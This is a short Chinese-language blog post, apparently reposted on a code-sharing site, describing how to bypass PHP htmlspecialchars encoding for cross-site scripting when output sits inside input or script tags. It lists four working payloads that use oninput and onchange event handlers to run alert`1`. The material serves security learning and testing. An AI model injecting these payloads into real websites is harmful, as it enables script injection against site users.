xss繞過htmlspecialchars實體編碼的姿勢


倘若是在script、input標簽當中,即可突破。
Payload

' oninput=alert`1` //      當要在input中輸入內容時觸發事件
' oninput=alert`1` '       同上
' onchange=alert`1` //  發生改變的時候觸發該事件
' onchange=alert`1` '   同上

在script里直接alert

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM